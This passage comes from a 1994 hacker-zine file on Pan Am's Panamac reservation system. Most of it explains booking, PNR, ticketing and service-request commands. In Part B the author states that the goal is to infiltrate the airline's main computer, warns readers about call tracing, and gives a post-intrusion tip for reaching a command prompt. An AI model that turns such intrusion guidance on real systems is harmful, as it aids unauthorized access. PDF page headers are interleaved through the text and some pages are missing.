the currency code for Greek money and whats it called ? KITTA - What movies will be shown
on the flights next month ? KIIHCH - Is there an Inter-Continental Hotel in Columbo ? KIBOMC -
How many cigarettes are allowed for a passenger going to Bombay ? KINYCV - Where can one
go to get a Yellow Fever shot on N.Y ? KIJFKT - How much will a taxi cost from JFK Airport into
the city ? KILONK - What time did a flight PA 56 arrive in London this morning ? Its impossible
to list all the Key Ins in this article. In future I may write up an article listing all of these. Part III
DDDDDDDD Booking Pan Am Flights: ----------------------- To ask Panamac which flights are
available on a specific day, you type a standard availability entry : >A 6JUNNYCMIA0900 Lets
break it down: - The 'A' is always used.Its is the action code to request availability - The '6' is
the departure date - The 'JUN' is obviously the first three letters of the month - 'NYC' is the
origin city where the flight is taking off - 'MIA' is destination city which in this case would be
Miami - and the '0900' is the time desired So therefore on a flight on 3rd of July from Nairobi
to London at 1100 hours would be: >A3JULNBOLON1100 [spacing is optional] When requesting
availabity FROM/TO codes should be CITY codes.This will allow Panamac to display the full
schedule of flights operating FROM/TO all airports in that city,beginning with the time
requested. For eg. If you request availability FROM/TO JFK,Panamac will only display flights
that operate FROM/TO JFK but If you request availabilty FROM/TO NYC, Panamac will display
flights operate FROM/TO JFK and LGA Availabity Display: ------------------- Panamac will display
up to 6 lines of both direct and connecting services beginning with the Pan Am flights closest
to the time requested. For eg: Lets assume that one the sales agent has made the following
entry from Newyork city to Frankfurt: >A 18AUGNYCFRA1800 The Panamac will display the
following output: 18 AUG-THU-PA HELI FREE PJ ALTERNATE SERVICE 1PA 72 PAJAYABOHA
JFKFRA 1830 0745*1 74X DDD0 715 2PA 4 PAJAYABAHA JFKFRA 1800 1215*1 74* DDD1 1015 :
: : : : : : : : [and so on...] Rememeber these are "Direct Flights" not connecting Analyzing thefirst 2 lines: --------------------------- line 1: ------- 18AUG-THU - The date you requested with the
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 18/50
day of the week PA HELO FREE - City Pair Message..Consists of general info ALTERNATE
SERVICES - Service other than than direct PA is programmed Line 2: ------- 1 - Line number.
PMC will display up to six lines of both direct and connecting service beginning with those
flights closer to the time required PA - PA is the airline code for Pan Am 72 - Flight number
PAJAYABOHA - Indication of classes for eg: P - Premium First Class J - Premuim Clipper Class
(wide body aircraft) Y - Mormal Eco Class B - Apex fare H - Bulk Fare A - This indicate that theflight is available 0 - No seats available (ZER0) JFKFRA - This will tell you the departure and the
arrival.Only AIRPORT CODES are used. 1830 - Departure time 0745 - Arrival time *1 - This will
show when the flight will arrive one day later 74X - [Self explanatory] DDD - Indicates that
meals are served if Blank then no meals served 0 - The NUMBER of time the flight will make a
stop between the two airports 715 - Elapased flying timw in hours and minutes. Sometimes
after the entry of classes one may see "X plus to digits of the week...For eg. "X13 This means
that flights operates only on certain days of the week except Mondays & Wednesdays. If blank
then flights are everyday. If no specific departure time is indicated by the passenger an
availability entry can be made indicating "A" for A.M , "P" for P.M and "N" for noon. eg.
>P23FEBNYCAUS --> In this case the Panamac assumes that its 1700 Short selling -------------Lets say one of the availability display was as follows: 10DEC 4PA 754 JAYA JFKLHR 600 1200
74X S 0 6:00 The departure is from JFK to london's Hethro Airport Now suppose you wanted to
book 3 seats on this flight.They would enter as follows: > N3Y4 N - This the abb. for "need" for
the Panamac 3 - Number os seats.In our case 3 Y - This is the class (Y in this case) 4 - This tells
us the line number of the Display explained above This method of booking seats is called short
selling.[Short Sell] incase you ever ever hear it. The Panamac will respond with: 1PA 754 Y
10DEC JFKLHR HS3 600 1200 1 - This represents the numbers of flights the sales agent has
booked PA - The 2 letter code for Pan Am 754 - Is obviosly the flight # Y - The class 10DEC - The
date of departure from NYC JFKLHR - Flight going from Newyork City to London HS3 - (H)ave
(S)old three seats confirmed 600 1200 - the the departure and arrival time Connecting Flights: -
------------------ Many times a passenger travels from point of origin to final destination by
connecting from one flight to another at an intermediate point or points This will be a single
connection wehn only one point (City) is involved and there is also a concept of "double
connection" ... This obviously means that the person changes flights at 2 cities. While viewing
the display a typical connecting flight would look like this 5PA 120 PAJAYABAHA 1DEC [ ]LON
600 1200 75X LLL0 600 400 It is a clearly visible that this is a connecting flight because we have
the elapsed time (600) and the total elapsed time of connecting service from origin city to its
destination (400)...Simple enough huh ? Short selling is also done in this case. Format used: [ N
][# SEATS][CLASS][FROM A DISPLAY LINE][ITS CLASS][FROM LINE] How to display a particular
flight: ----------------------------------- Assume that you have the following flight on an availability
display 01JAN-FRI- 1PM 90 PAJAYABOHA LAXZRH 1030 0930*1 74X 2 1515 Suppose you make
a reservation on flight 90, the 01JAN and want to ask the sales agent where the flights stops
en-route and what day the flight arrives. This is what he/she will enter into PANAMAC... >S PA
90 / 01JAN LAX S - Code for schedule PA90 - Carrier code & flight number / - A slash as a
separator 01JAN - Departure date from boardpoint LAX - is the broad point.The three letter
airport code Output will be: SPA90/1JANLAX LAX JFK ZRH STR TXL 1839 0930*1 1210*1 1400
1030 2015 1135*1 1255*1 Flight 90 departs Los Angeles (LAX) at 1030 and arrives New York
(JFK) at 1839,leave New York at 2015, arrives Zurich at 0930 the next day because the (*1)
indicate it then leaves Zurich at 1135 that morning arrives in Stuttgart (STR) 1200 ... and so on.
. Retrieving Itinerary -------------------- It is sometimes necessary to view the booking. This is
done by using the "*" key on the right top of the keyboard.(THE DISPLAY KEY) Then type in "I"for itinerary. >* I Response will look something like this: 1 PA 90 P 13DEC JFKFRA HS3 600 1200
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 19/50
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 20/50
selected city. 2 APR - The date of the departure. MCO - is the broad point Output will be: 2
PA50F 2APR MCO /MCO OFF 1529 MIA IN 1611 AN ON TIME ARRIVAL /MIA OFF 1847 LHR IN
0733 This first entry would read as follows: Pan Am flight PA 50 departed at 1529 from MIA
and arrived at 1611 - Will indicate on time and so on. To request FLIFO for a selected broad
point, Enter 2 PA50 A 4DEC LHR A - This is the request for ARRIVAL/DEPARTURE info at the city
in entry 4 DEC - The arrival date LHR - London Hethro Airport which is the arrival city. Output: 2PA50 A 4DEC LHR /MIA OFF 1847 IN 0733 /LHR OFF 1150 FBU IN 1488 Part V ------ Open
Flights: ------------- Often people who are not sure (or not stable:=)) will keep there flight open.
This has to be instructed into the Panamac. Suppose the agent has made an entry of: >1 PA 56
P 19APR LAXJFK HS1 1200 1600 The HS1 means that he has booked 1 seat as explained above
also. Here in the example the passenger wants a round trip ticket first class an "open"
return.Therefore it would be: >0 PA 56 P JFKLAX QQ1 0 - Is the segment id (actually for the
open) PA - the ailine code 56 - is the flight number P - is the class QQ1 - This is the action
code.Compulsory for the open flight booking Response: 2 PA 56 P JFKLAX QQ1 This has actaully
booked a round trip ticket from JFK - LAX "Open" Schedule Displays: ------------------ Sometimes
it is necessary to display which airlines fly a particular route when not sure. Suppose the agentwanted to find out the all the airline that travel at a particular date from LAX to JFK then the
entry would be: >S 19APR LAXJFK A S - Entry for the (S)chedule 19APR - Date LAXJFK - Self exp.
A - Time ,here A.M (could be also P for P.M or N for noon) Output: 19APR-SUN- 1TW 747
FYBQM LAXJFK 1200 1400 73S 0 111 etc... etc... In cases where theres is service only once or
twice a week between 2 cities, you might have to make more than one entry to request a
schedule display. Eg: >S 1APR LHRSAN (Do not enter time because you want 24 <--day-->24
explained later) Output: NO MORE FOR DISPLAY LHRSAN o.k this mean that there is no service
between these 2 points on the day requested.O.k the PANAMAC scans this 24 hours before
and 24 hours after the date and time.This means that it has already scanned 3 days.So the next
entry would be: >S 3FEB LHRSAN But if there is no flight offered between the 2 points then the
system would reply: SVC NOT IN SYS Arrival not Known(ARNK) ----------------------- Suppose a
passenger was flying from LAX to JFK then he/she decides to take a bus from JFK to maybe CVA
(Cincinati) then from there return to LAX. This would be considered "Arrival Not Known"
(ARNK). Lets say a passenger booked a flight from LAX to JFK 1 PA 747 Y 10APR LAXJFK HS3
1200 1600 His route from JFK to CVA is not known. Therefore this will require the ARNK
function key. The entry would be: >0 A (or the ARNK function key) Output: 2 ARNK Then lets
assume that you have booked a return flight from CVA back to LAX then if you list your
Itinerary it would look like: 1 PA 747 Y 10APR LAXJFK HS3 1200 1600 2 ARNK 3 PA 745 Y 20APR
CVALAX HS3 1700 2100 Inserting Segment Entries: -------------------------- Mant times its
necessary to Insert Segment while booking flights. Suppose a person is flying from Albany
(ALB) to Miami (MIA) and back. His segment would look like: 1 PA 747 B 5ARP ALBMIA HS1 100
445 2 PA 747 B 10APR MIAALB HS1 1200 1545 Here the passenger is sure that he will return
back to ALB on the 10 of APR no matter what. Now he may proceed to book the rest of the mid
flight he wishes to take. So therefore after landing in Miami he wishes to fly to Orlando.Its
airport code is MCO for Mc Coy Int. Now the sales agent has to make insert a segment after
the first one. Here is how it done: >/ 1 [ Means Insert after segment #1] / - Symbol used to
specify "Insert After Segment" Use the "/" or "IAS" key 1 - The Segment #. The Panamac will
respond with " NEXT FOLLOWS 1 ". This indicates that your next entry will be after 1. After
Inserting segments a "*I" is necessary to renumber the segs. Also if you want to insert a
segment before 1 then enter (/ 0). Part VI ------- Inputing Name Entries: ---------------------- After
the flights have been booked the second part is to input all the names of the persons who aretravelling. O.k lets say 3 people were travelling together (Tom,Bill,Cathy and assuming that
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 21/50
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 22/50
DAVIS/AMERICANTR RCVD - Received RLOC - Record Locater and then the name. Changing
these entries is done by the CHANGE key using the same principal of changing name entries.In
this case use the field "6" then input change symbol then retype the name. TELEPHONE: --------
-- The harcored field used here is "9" not "6". This information is entered by first typing a 9
then the "Source Of Booking" (SOB) [See table provided for this entry] Then a mandatory "*"
sign. The SOB relates to the 6th field as we will see. Then comes the Phone number. If apassenger (D) booked a flight the letter "H" for Home or "B" is followed by the telephone
number and if its an agency/commercial/Interline then the name is used. S.O.B Table: -----------
- Direct (Passenger) - 9 D * Military - 9 G * Government - 9 G * Commercial - 9 C * Travel Agent
- 9 A * Interline - 9 I * Lets say you booked a flight and your phone number was 7185551234
and that was your business number, the Entry made would be: >9 D * 718/5551234 B If the
"*P" is invoked then it would display : RCVD/RLOC -MR DAVIS FONE-NYC-A 718/5551234 B The
"FONE" serves to indicate the Telephone field. The the NYC has nothing to do with the NPA of
the passengers phone number but it indicates the city location of the Panamac set where the
booking was made. The "A" after the NYC is taken from the S.O.B table. Passenger Relating: ----
--------------- The first entry in the FONE field always belongs to the person/company/ Travelagency etc in the RCVD field. You can enter additional phone numbers using the same format
as the first FONE entry. On additional entries,you must specify which passenger or passengers
the phone number is for. This is done by including in the FONE entry the PASSENGERS NAME
NUMBER of the person(s) who can be reached at that phone. This proccess is called
PASSENGER RELATING Lets say we have the entry: 1.2SMITH/JOHNMR/MARYMRS 1 PA 56 B
19APR JFKLAX HS2 600 1000 RCVD/RLOC-AMERICAN TR. AGENCY FONE-NYC-A 718/555-1234 H
The Smiths, John & Mary have the same home fone number.Therefore passenger 1-2 have the
same #s.This has to be specified into the PANAMAC by: >9 1-2 A* 718/555-4321 H To display
NAME,ITINENARY,RCVD AND FONE at the same time enter: >*R (Record) Output:
1.2/SMITH/JOHNMR/MARY COL 1 PA 56 B 19APR JFKLAX HS2 600 1000 RCVD/RLOC-
AMERICAN TR. AGENCY FONE-NYC-A 718/555-1234 American Tr.Agency 2.1-2 NYC-A 718/555-
4321 H etc... Changing entries is a simple task. Lets assume the sales agent wants to change
the first FONE entry which is for the Travel Agency.The command would be: >9 1 (Change
Symbol) A* [FONE number & and the name of the agency] 9 - fone entry 1 - First
entry.(2.)would be the second FONE entry which is the Passenger home fone number.( If there
was a third entry it would start with (3.) and so on.. A* - From SOB Deletion of the entries I will
leave you to figure out. Address Entries & Payment: -------------------------- The Address entries
and the form of payment are included in FONE entry as well. This was the Info is stored in the
PNR until the time of ticketing. Address: [Use same format] >9 1-2 C* 42-95 ELM STREET /
FLUSHING N.Y 10011 Payment: >9 D * AX 1234 567 11111 EXP 9/90 MR DAN DAVIS Ticket
Entries: --------------- The Entries in the Ticketing field tell us if the passengers already has a
ticket or when and how its going to be issued.(Mail etc.) or when its going to be cancelled.A
ticketing code is issued for these situations: Ticket Codez ------------ W - Here ticket will be
issued on the date entered. Passenger will pick it up on that date. U - The ticket is mailed
here(TBM) on date entered Q - Here the ticket will be given by the travel agency on date
entered O - Ticketed The field used here is "7" hardcored for Ticketing purposes. Typical entry:
>7 W APR19 Usually one day after is added to APR19 so that passenger has the whole day to
purchase the ticket. The entry then would look like: >7 W APR20 * APR 19 The "*" is
mandatory. Mailing: ------- Lets look at an example of TBM: >7 U 19ARP * CK FOR CHECK This is
entered when waiting for the passengers check to arrive. On 19APR its checked for arrival. If
arrived then the tickets are mailed. If check is not received then tickets are not mailed. If thepayment is made by a Credit Card then entry is: >7 U 19APR * CC This agent will refer to the
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 23/50
fone field where the CC info is stored. Here the ticket is mailed on the date issued. Outside U.S
travel agencies are given a Ticket Time Limit. The entry is: >7 Q 5MAY When showing PNR
ticketed with the letter "O". Its not necessary to enter a date, as the Panamac already enters it
that the reservation is being ticketed Enter: >7 O [assume that the date today is 5may]
PANAMAC will display: TKT-O 17APR NYC 000 [SINE OF THE AGENT WHO MADE THE ENTRY]
TKT-O - IS THE TICKET CODE 17APR - TODAYS DATE MYC - PANAMAC SET LOCATION 000 -SEPARATOR [ ] - SINE OF THE AGENT If all passengers are having thier tickets issued at the
same time and place, passenger relating is not necessary. But, if the passengers have different
dates or ticketing arrangements then the entries must be made separately and Passenger
Name Related. For eg. Assume there are 3 passengers on the PNR. Passenger 1 and 2 will call
for their tickets at the Pan Am office and June 3. Passenger 3 wants his ticket mailed on June 6
and will pay by personal check. The entries are: >7 1-2 W 3JUN >7 3 U 6JUN * CK FOR CHECK
Output: TKT-1-2 W03JUNNYC000[SINE OF AGENT] 2.3 U0JUNNYC000[SINE OF AGENT] CK FOR
CHECK Here the 1-2 is the first entry related to the passengers 1 & 2 and 2.3 is the second
entry related to passenger 3 NYC - location of P.set Change/Delete : --------------- Suppose the
display for the ticket field was: TKT-W08APRLAX000BS Here the ticket will be issued on the 8thof APR. The Panamac set is located in LAX(Los Angeles). Also after the sepater (000), the BS is
just an example of a SINE of the agent. Lets assume today is 7th of APR and the passenger has
come to pick it up. The agent has to instruct the PANAMAC that its TICKETED. Therefore
he/she would enter : >7 1 (Change Symbol) O Here: 7 - This is the field of the ticketing 1 - is the
entry number O - New Information One has to remember that if changing related TKT entry
then just enter Passenger Name number after the Change Symbol. Then the new Inforamtion.
It may look like "7 1 (Change Symb.) 1-2 W 19APR" To delete an entry just enter Field , Entry #
then the Change Symb. End Trasaction:(ET) ------------------- The PNR is now complete. After
completing it the agent must End Transaction (ET).This key is located as one of the function
keys. >ET Output: A OK 4SW#32G The 4SW#32G is called the RAD NUMBER or RECORD
LOCATER or PNR ADDRESS. After Ending Trasaction the PANAMAC will send a message to all
the airline in the Itinenary advising them of the flights the agents have booked/requested and
name of passenger. SHELL PNRS ---------- Some records like travel agencie's accounts, corporate
accounts and thier FT number, Tel #, Address etc. have to be stored permanently in the PNR.
Therefore Panamac has what called SHELL PNRs. Here file will become a permanent and
reusable record. A shell PNR can be retrieved by the account number, Telephone number and
ARC (Airline Reporting Corporation) or IATA(International Air Transport Association). The
ARC/IATA use last 5 Digits numeric plus check digit The entry to display a shell PNR before
beginning normal PNR creation begins with the letters "RP" then a "*" then comes the Account
Number. Example: >RP*7183589901 Ouput would be: NYC PA A QH 24FEB88 2034 NO NAMES
NO ITIN FONE-NYC-A 718/358-9901/*ARC 413453 2.NYC-A AMERICAN TKT-024FEBNYC000BS
DKIR RMARS-* The Itinenary may now be booked and the PNR completed as usual. Shell PNRs
may also be retrieved using the following entries: ARC/ATC # - RP*ATC494340 [use last 5
numbers numeric plus check digit] IATA # - RP*ITA945934 [Also use last 5 numeric plus D.C]
Account Code Number - RP*ACN7734 (In some countries only] Shell PNRs can be merged with
PNRs by just entering a "M" after the RP. Retreiving a PNR: ----------------- After the sales agent
completes a PNR. It is sent to the Master Computer at Rockleigh,N.J. To retreive a PNR , enter
"*" and the PNR ADDRESS or by using the flight,date and boarding off and on points and name
of passenger eg: >* PA 56/10AUG MIANYC - DAVIS The hyphen is mandatory here. The
Panamac's output will be: PA56/10AUG MIANYC - DAVIS 01
3DAVIS/TOMMR/CATHYMRS/FIFIMS 02 1DAVIDSON/SHASHI : etc : To retrieve the entries justchoose the line number then enter: >*2 The "*" has to be there or errors will ocurr. [No
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 24/50
comand probably] Anyway the "*2" will give you the account for Davidson. To cancel a PNR
you retrive just enter the "IXTN" in the fuction keys. END OF PART A ------------- =-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = P/HUN Issue #3, Volume #2:
Phile #6 of 11 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X X / / The Pan Am Airline Computers
(c)1994 "PART B" X X --------------------------------------------- / / X X By Red Knight / / X X A P/HUNMagazine Incorporation Productions / / X
X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/ Introduction & clearing up a
confusion -------------------------------------- Welcome to Part B of "The Pan-Am Airline Computers".
I hope you have found the first part intresting. I would like to take this opportunity in clearing
up a minor confusion that some of you may have while reading the first part of this file. There
are 2 types of systems I talk about in the first part which are: o Pan-Am main computer & o
The Panamac or PANAMAC The Pan-Am main computer is used to store and view performance
of the entire network. Pan American has 3 main computer systems to serve the surrounding
states. These are located in Florida, Washington and NewJersey. There may exsist one in
California but we dont have enough proof to be sure.Although they may have smallerterminals connected to these 3 major terminals and all the material that is covered here also
applies for these smaller terminals. The Panamac are computers that are used by sales agents
to book flights, give information and the works. Although the Pan-Am main computer can also
handle all the tasks that the PANAMAC can. Here is what the the Pan Am network looks like:
Example of a simplified Pan Am Network -------------------------------------- Cartridge & The
Panamacs will be in the same building. Like the major Pan Am building in Manhatten in
Newyork. _____________________________________________ Sub Terminals | | | +------ &
Other +---- Panamac +-------|-+ airlines ______________ |---- Panamac | Pan-Am | +----------+ +
+ |---- Panamac Sales Agents | main |--| Sub |--|Cartridge Area|---|---- Panamac on each
terminal | computer| | Terminal | +______________+ |---- Panamac +---------+ +----------+ |----
Panamac | |______________ +---- Panamac Sub Terminal Other Agencies The cartridge area is
where they insert physical cartridges for new rates of travelling, new routes , cancellation of
rountes etc. The Panamac uses all this information supplied by the cartridge area so that the
Sales agents can answer our various questions and book us flights. The cartridge area contains
the main program for the Panamac's to run. All the information from the cartridge area is
passed to the sub terminal then to the main computer The surrounding states may connect to
one or many sub terminals then finally leading to the main computer. Our main purpose here
is to infiltrate the main computer where all the information is stored and has control over the
entire network that it serves. I have heard from employees that Pan-Am has the latest on ANI
equipment and therefore please proceed with caution. Another thing is that when you have
successfully hacked the system and you dont get the SOM ">" prompt then type in
">SOMTERM" and hopefully you will end up with the SOM. I hope this has cleared the
confusion and now lets continue. Part VIII --------- Host Facts ---------- The Host facts field
contains 2 types of entries: Other Service Information (OSI) entries which give information
about passenger so that they can be offered proper assistance or recognition. A passengers
speaks (SPKS) only a language other than English or Meet and assist (MAAS) and this passenger
is elderly and needs assistance. Into the OSI goes anything pertinent from age to language,
that they should know in order to talk to the passwngers as an individual. All the entries in the
FAX field begin with digit 4. The code "PA" os used to send message to Pan Am only, This
special information is entered as follows: >4 OSI PA_MAAS PSGR ELDERLY ASSIT IN TRANSIT A
space is madatory only after PA then free form test is permitted. OSI information will betransmitted to the airport so that the appropriate action may be taken. In addition, special 4
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 25/50
chracter codes are to be used if the OSI details are to be taken transmitted directly to the
airport check system. >4 OSI PA SPKS SPANISH ONLY >4 OSI PA FRTV PA62634678J-STARK/AMR
If the passenger's description does not match one of the codes listed in the system enter the
information as free form test after the "PA" For eg. >4 OSI OA VIP MAYOR OF N.Y In addition
there is a special format to indicate that a passenger is an infant (INF) which include the age
indicated in months (1yr=12MTS) For eg. >4 OSI PA INF DAVIDSON/JR MSTR 5MTHS Note: Ifthere are two or more infants traveling, seperate OSI entries must be made for each other Part
IX -------- Special Service Requirements (SSR) entries which require prior arrangements for
something special to be provided to the passenger at the airport or on the plane. Entries in this
category arrange for a specific item. (e.g. special meal) to be provided on a flight for the
passenger, or to advice the Airport the passenger is traveling with something which may
require advance preparation: e.g a large pet in cargo or a large amount of excess baggage.
Since we are requesting that a specific items be provided (e.g special meal be put on the
flight), the entry is made with an action code. At the same time, the entry is related to a
specific segment(s) in an intinenary and to a particular passenger name(s) in the PNR. We need
to look at an example. Here is a PNR: 1.1 SHAH/BUPENDRA 2.1EZRA/AMR 1 PA 66 P 19APRJFKBOM HS2 2145 0015 RCVD/RLOC-MR SHAH FONE-NYC-D 212/555/1234/H TKT-
026FEBNYC00020 Mr. Shah wants a vegetarian meal. Here is the entry: >4 A VGML FS1 S1 N1
Lets break this down: 4 - 4 field A - Means add SCR VGML - Vegetarian meal code FS1 - Action
Code (free sell ) + Number requested. S1 - Related to Segment 1 N1 - Related to Name number
1 Look at this PNR carefully. The entry relates the special meal in this case vegetarian to the
first segment (S1) and to the first passenger, Mr. Shah, who is name number 1 (N1). When re-
displayed, the HA FAX field appears as follows: HA FAX-SSRVGML.PAHS01
PA0066P19APRJFKBOM 1SHAH/BUPENDER Information about Pan Am policy and procedures
governing some SSR entries can be found in KISSR. Here is a display of the index: SSR STATION
INFORMATION INDEX BASSINETS B SPECIAL MEALS S WHEELCHAIRS W In the KISSR you will
find description and codes for all special meals and facts about the current meal and
wheelchair policy. Not all SSR items may be freely sold (FS). The R.M describes the procedure
for requesting (needing) special service requirements. For example, request (NN) on: Special
meals within 8 hours of departure or Excess baggage over 150 kilos (350 lbs) Looks at this
example: Mr. C. Tuc in addition to his free allowance has baggage which will weigh about 175
Kkilos. The entry will be: >4A XBAG NN 175KGS S1 N2 . RECORDING EQUIPMENT XBAG - This is
the excess baggage code NN - Action code 175KGS - Weight in Kilos S1 - Segment number N2 -
Name number 2 . - This separator which is compulsory RECORDING EUIPMENT - Text In this
case there is also a description of the excess baggage. The description or text is mandatory for
this entry. The period(.) which acts as a separator preceeds the text. All SSR entries regarding
excess baggage must include a text and may relate to only one passenger When redisplayed,
the HA FAX field now apprears follows: HA FAX 1.SSRVGMLPAGS01 PA0066P19APRJFKBOM 1
SHAH/RMR 2.SSRKSMLPAHSO1 PA0066P19APRJFKBOM 1 TUC/AMR 3.SSRXBAGPANN0175KG
PA0066P19APRJFKBOM 1 TUC/AMR RECORDING EQUIPMENT SSR Name relating -----------------
In from of each name is a name item number. You already know that PANAMAC assigns
numbers for each different surname in a PNR. Also, each passenger has a passenger name
number. In the FACTS example so far, the item number and the passenger name number were
the same. A B C 1. 1AOKI/LSMRS 2. 1YAMADA/YRMRS 3. I/1YAMADA/GLENMSTR 1,2,3 are
Name Item NBR & the A,B,C are passenger name numbers When you relate an SSR fact, your
entry really refered to the name item i.e N2 refers to all the passengers in name item 2 (in this
case only Mrs. Yamada) If however the entire Yamada family had been travelling together as inthe following example the name item include more than one name: 1.1AOKI/LSMRS
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 26/50
2.3YAMADA/GOMR/YRMRS/LAMISS 5.1/1YAMADA/GLENMSTR 1 PA 82 Y 16 NOV HNLAX HS4
2300 0604 1 PA 81 Y 28 NOV LAXHNL HS4 1300 1702 If you SSR entry showed name relation to
name N2, then the request would be for all the passengers in NAME ITEM 2... Mr/Mrs/Miss
Yamada/ To show a special request for only one passenger in a name item, use a slash (/) after
the name number. The slash acts to "separate" an individual passenger from the name item
may which may include multiple passenger. For example: Mrs Yamada is name NBR 3. Toconfirm a baby meal on both flights the entry would be: >4A BBML FS1 S1/2 N3/ The N3
indicates the name number only Change/Delete/Cancel -------------------- If you are in the
process of making an SSR entry and you have ended the transaction, no action has yet been
taken on the request, You can therefore delete the entry. For example >4 3 [change symbol]
You on the other hand while at home can user "*" which works the same way. The 4 is the
field, the 3 is the Fact ITEM number . You cannot modify an SSR entry to correct it. If your entry
is incorrect, you must delete the entry and reenter the correct SSR fact itme. In all instance,
whether working on a new or retrieved PNR, cancellation of an itinenary segement will
automatically cancel the related SSR item. For e.g. you have booked: 1.1BROWN/HARRYMR
2.1TOBAR/EMILEMR 1 PA 100 Y 13NOV JFKLHR HS2 1000 2140 Before ending transaction younotice you accidentally confirmed the wrong date. After cancellation of the incorrect segment,
the HA FAX SSR item will look like this: HA FAX 1.SSRKSMLPA(XX)02 PA0100Y13NOVJFKLHR
1BROWN/HARRYMR 1 TOBAR/EMILEMR Cancelled SSR entries will automatically be removed
from the PNR when you End Trasaction. Now you would rebook the correct flight and the
Kosher meals. Part X ------ Other Airlines...General Facts ------------------------------ The GFAX or
the General Facts, 3 filed contains the same (2) types of entries as the Host Fax...OSI and
SSR..Entries in the GFAX are included to outgoing messages to other airlines upon ending
trasaction. When an itinerary includes space on another airlines, you must use the GFAX field
to notify the other airline about the special requirements or service information. All entries in
GFAX befin with the digit 3. To send "OSI" information to one (1) other airlines, use the
applicable carrier code. For instance, if the passenger is an infant travelling on PA and AF, you
notify Air France that you booked an infant by sending an OSI message. The entry is: >3 OSI AF
INF JONES/MARK MSTR 5 MTS This is in addition to an OSI entry in the 4 field to notify Pan Am
at the airport, Thus 2 entries with the same information are required. >4 OSI PA INF
JONES/MARK MSTR 5 MTS If a passenger's itinenary include more than one other airline, use
the letters "YY" as the carrier code and make only one GFAX entry. A "YY" will send the
information to all the airlines in the itinerary. >3 OS1 YY INF JONES/MARK MSTR 9 MTS
Change/Delete ------------- The input to delete an OSI in the GFAX filed is the same as in HFAX.
>3 1 (change symbol) To change an OSI entry in the GFAX field the format is the same. You
delete, then reenter the correct information. >3 OSI AF.... (NEW INFO) GFAX SSR Entries: --------
--------- SSR entries for other airlines are very similar to Pan Am HA FAX entries. The entry
begins with "3A", followed by the segment and name related request. For e.g >3A KSML NH1
S1 N1 Breakdown 3A - This is the GFAX special service request KSML - Meal code NH1 - Action
code to request S1 - Segment number N1 - Name item number. Any SSR entry to another
airline is always on a request basis (NH) The request message is forwarded to the applicable
airline(s) and must await a reply. Meanwhile, the passenger is adivised the Pan Am has
requested the special service from the other airline(s) involved. Assume that you have made
the following reservations: 1.1WILSON/ERMR 1 PA 218 Y 26FEB CCSJFK HS1 X 0940 1420 2 DL
1425 Y 26FEB JFKSLC HS1 1805 2040 The passengers desires a vegetarian meal and will be
taking his dog (weight 30 lbs) with him. To book the SSRs on Pan Am the entries are: >4A VGML
FS1 S1 N1 >4A AVHI FS1 S1 N1 . DOG 30 LBS (AVIH = live animals in hold) To book the SSRs onDelta Airlines the entries are: >3A VGML NN1 S2 N1 >3A AVIH NN1 S2 N1 . DOG 30 LBS
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 27/50
Change/Delete ------------- To cancel or delete items in the GFAX handle exactly as in HFAX.
Before end Transaction: >3 1 (change symbol) On a retrieved PNR: >3 . 1 XX Encode/Decode
ARIMP Abbreviations --------------------------------- "ARIMP" codes are abbreviated messages
which are used to communicate within the airline industry. These are listed in Panamac's "KI"
information systems and may be accessed using the following entries: To find the code for a
message (ENCODE), enter: >KI COD _ (using first letter of subject) To DECODE an abbreviatedmessage, enter: >KI DCO _ (using first letter of subject) Part XI ------- Advance Seat Assignments
------------------------ It is Pan Am's policy to assign seats prior to departure only when requested
by passengers. As you know many of us may want specific seat numbers or certain area for e.g
smoking,non-smoking,window seats,aisle.Seats have to be requested when the booking is in
progress. Lets take an example. Lets say you have booked a seat for Mr. Davdison on he has
requested seat 3A which is in the non-smoking area and in the first class (P) cabin. His entries
looks like: 1.1DAVIDSON/PLDR 1 PA 30 P 19APR JFKLHR HS1 X 1200 1800 2 PA 40 P 20APR
LHRNBO HS1 100 700 To book his request a Host Facts entry is made. For e.g: >4A NSST NN1
S1 N1 . SEAT 3A 4A - Explained before NSST - is code for Non Smoking Seat NN1 - is the action
code S1 - Segment 1 N1 - Name 1 . - Separtor which is compulsory 3A - This is the requestedseat If this seat is available then you will get a "*". A display of the PNR will show the following:
1.1DAVIDSON/PLDR 1 PA 30 P 19APR JFKLHR HS1 X 1200 1800 2 PA 40 P 20APR LHRNBO HS1
